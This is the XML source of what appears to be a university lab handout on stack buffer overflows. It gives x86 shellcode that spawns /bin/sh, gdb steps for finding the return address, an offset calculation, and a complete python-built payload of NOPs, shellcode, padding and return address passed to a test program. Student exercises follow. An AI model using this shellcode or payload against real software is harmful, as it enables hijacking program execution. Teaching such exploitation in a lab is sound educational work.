        </w:rPr>
        <w:t>\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00543EC0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>xcd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00543EC0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        </w:rPr>
        <w:t>\x80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00543EC0" w:rsidP="004F214C" w:rsidRDefault="00543EC0" w14:paraId="6A238005" w14:textId="09FFB796">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00543EC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Practic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00543EC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Try to see that the shell code is working. Define a string which contains the shellcode above. Define a pointer function and run it. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00543EC0" w:rsidP="004F214C" w:rsidRDefault="00543EC0" w14:paraId="3232B1A9" w14:textId="5156ECD4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="4836085F" w:rsidR="1141DC72">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Hints:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="253992BA" w:rsidP="4836085F" w:rsidRDefault="253992BA" w14:paraId="60787A97" w14:textId="12C54141">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="4836085F" w:rsidR="253992BA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>g</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00543EC0" w:rsidP="00543EC0" w:rsidRDefault="00A86D25" w14:paraId="027FCD3C" w14:textId="3139BC5C">
      <w:r>
        <w:t xml:space="preserve">To make sure the alignment is correct we can add before shell code some </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> instructions, a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> instruction is an instruction which does nothing, just wastes a CPU cycle. The code for a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> instruction is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>0x90</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A86D25" w:rsidP="00543EC0" w:rsidRDefault="00A86D25" w14:paraId="0EFBD364" w14:textId="2DF48444">
      <w:pPr/>
      <w:r w:rsidR="00A86D25">
        <w:rPr/>
        <w:t xml:space="preserve">Now, the return code can be found again with </w:t>
      </w:r>
      <w:r w:rsidR="00A86D25">
        <w:rPr/>
        <w:t>gdb</w:t>
      </w:r>
      <w:r w:rsidR="004662F7">
        <w:rPr/>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="631BB290">
        <w:rPr/>
        <w:t>qq</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004662F7" w:rsidP="004662F7" w:rsidRDefault="004662F7" w14:paraId="7DBBC200" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ./ex </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>some_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="004662F7" w:rsidP="004662F7" w:rsidRDefault="004662F7" w14:paraId="270E83A5" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">b </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>func</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="004662F7" w:rsidP="004662F7" w:rsidRDefault="004662F7" w14:paraId="72DD1E57" w14:textId="77777777">
      <w:pPr/>
      <w:r w:rsidR="004662F7">
        <w:rPr/>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004662F7" w:rsidP="00543EC0" w:rsidRDefault="004662F7" w14:paraId="0862FB58" w14:textId="4B06C2F0">
      <w:r>
        <w:t>info frame</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004662F7" w:rsidP="00543EC0" w:rsidRDefault="004662F7" w14:paraId="5D715E48" w14:textId="3DEEB0E8">
      <w:r>
        <w:t xml:space="preserve">From info frame you will find this information </w:t>
      </w:r>
      <w:r w:rsidRPr="004662F7">
        <w:t xml:space="preserve">Previous frame's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004662F7">
        <w:t>sp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004662F7">
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004662F7">
        <w:t>0xffffd0e0</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, where we should put the address of our buffer cause if we do this we will overwrite the return code for the function with our buffer address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004662F7" w:rsidP="00543EC0" w:rsidRDefault="004662F7" w14:paraId="09057A92" w14:textId="30765C8B">
      <w:pPr/>
      <w:r w:rsidR="004662F7">
        <w:rPr/>
        <w:t xml:space="preserve">How much we should overflow our buffer – the buffer address in my case is </w:t>
      </w:r>
      <w:r w:rsidR="004662F7">
        <w:rPr/>
        <w:t>0xffffd</w:t>
      </w:r>
      <w:r w:rsidR="00087414">
        <w:rPr/>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="004662F7">
        <w:rPr/>
        <w:t>4c</w:t>
      </w:r>
      <w:r w:rsidR="004662F7">
        <w:rPr/>
        <w:t xml:space="preserve">, the address with the return code is at </w:t>
      </w:r>
      <w:r w:rsidR="004662F7">
        <w:rPr/>
        <w:t>0xffffd0e0</w:t>
      </w:r>
      <w:r w:rsidR="004662F7">
        <w:rPr/>
        <w:t xml:space="preserve"> – difference being 148, buffer size is 128, so we have to overflow with 20 characters. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004662F7" w:rsidP="00543EC0" w:rsidRDefault="004662F7" w14:paraId="62323F27" w14:textId="08A85A9D">
      <w:r>
        <w:t>Our buffer will be:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004662F7" w:rsidP="00543EC0" w:rsidRDefault="004662F7" w14:paraId="3DA8F3A1" w14:textId="6C02B720">
      <w:r>
        <w:t xml:space="preserve">24 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> instructions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004662F7" w:rsidP="00543EC0" w:rsidRDefault="004662F7" w14:paraId="3F38460A" w14:textId="179DCD80">
      <w:r>
        <w:t>25 characters the shell code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004662F7" w:rsidP="00543EC0" w:rsidRDefault="004662F7" w14:paraId="1BE16684" w14:textId="0BB13D0D">
      <w:r>
        <w:t xml:space="preserve">Some 99 random garbage characters </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004662F7" w:rsidP="00543EC0" w:rsidRDefault="004662F7" w14:paraId="297FC11D" w14:textId="36254E76">
      <w:r>
        <w:t>And the return address which will be our buffer address. So, the command in my case should look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004662F7" w:rsidP="00543EC0" w:rsidRDefault="004662F7" w14:paraId="503FC6CE" w14:textId="3DC794C2">
      <w:r w:rsidRPr="004662F7">
        <w:t>./ex $(python -c 'print (24*"\x90"+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"+99*"A"+"\x4c\xd0\xff\xff")')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004662F7" w:rsidP="00543EC0" w:rsidRDefault="004662F7" w14:paraId="2CA2AF6B" w14:textId="783066A5"/>
    <w:p w:rsidR="004662F7" w:rsidP="00543EC0" w:rsidRDefault="004662F7" w14:paraId="73DED2C8" w14:textId="4728B96F">
      <w:r>
        <w:t xml:space="preserve">Please see at the end that because of endianness representation I write the buffer address which was </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>0xffffd04c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as \</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>x4c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xd0</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00087414">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00087414">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00087414">
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00087414">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00087414" w:rsidP="00543EC0" w:rsidRDefault="00087414" w14:paraId="005EA721" w14:textId="4A3E3B42"/>
    <w:p w:rsidRPr="00087414" w:rsidR="00087414" w:rsidP="00543EC0" w:rsidRDefault="00087414" w14:paraId="50743B81" w14:textId="0D037350">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Practic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: Find the buffer needed on your computer to run the attack and obtain the shellcode.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00543EC0" w:rsidR="004662F7" w:rsidP="00543EC0" w:rsidRDefault="004662F7" w14:paraId="5FFCC318" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidRPr="00543EC0" w:rsidR="004662F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16C36"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2CB8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4E"/>
    <w:rsid w:val="00087414"/>
    <w:rsid w:val="002139B8"/>
    <w:rsid w:val="004662F7"/>
    <w:rsid w:val="004F214C"/>
    <w:rsid w:val="0051720E"/>
    <w:rsid w:val="00543EC0"/>
    <w:rsid w:val="00824B4E"/>
    <w:rsid w:val="00A86D25"/>
    <w:rsid w:val="00B90CB8"/>
    <w:rsid w:val="00C4268B"/>
    <w:rsid w:val="00C57E96"/>
    <w:rsid w:val="00DA12FF"/>
    <w:rsid w:val="00E431B8"/>
    <w:rsid w:val="00F54BD8"/>
    <w:rsid w:val="1141DC72"/>
    <w:rsid w:val="12D7CE29"/>
    <w:rsid w:val="23B1D41A"/>
    <w:rsid w:val="253992BA"/>
    <w:rsid w:val="4836085F"/>
    <w:rsid w:val="631BB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DBE9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5FD097EC-1BEC-46E1-AB6F-793457EAEA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24B4E"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="c-mrkdwntab" w:customStyle="1">
    <w:name w:val="c-mrkdwn__tab"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00543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7A4F88A256A4FA1BDF73C03DCC731" ma:contentTypeVersion="4" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="f28f8aad008a70944e9d59d95721917c">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="eaf32c49-4068-4c94-a5d3-f7905148f70d" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="9572a7e326452fa268ab161d70ae4366" ns2:_="">
    <xsd:import namespace="eaf32c49-4068-4c94-a5d3-f7905148f7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32c49-4068-4c94-a5d3-f7905148f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3E21D5-5303-46B1-9DC3-E4586542989E}"/>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4511E5B7-7BDB-4C49-83DF-54C01D0DBB17}"/>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{014EDCD6-6380-4684-AAD3-87F5A69B85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Mihai Silviu MURGAN</dc:creator>
  <keywords/>
  <dc:description/>
  <lastModifiedBy>ANDREI POPA</lastModifiedBy>
  <revision>8</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-07T09:41:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-20T19:51:31.5397401Z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0x0101007FD7A4F88A256A4FA1BDF73C03DCC731</vt:lpwstr>
  </property>
</Properties>
</file>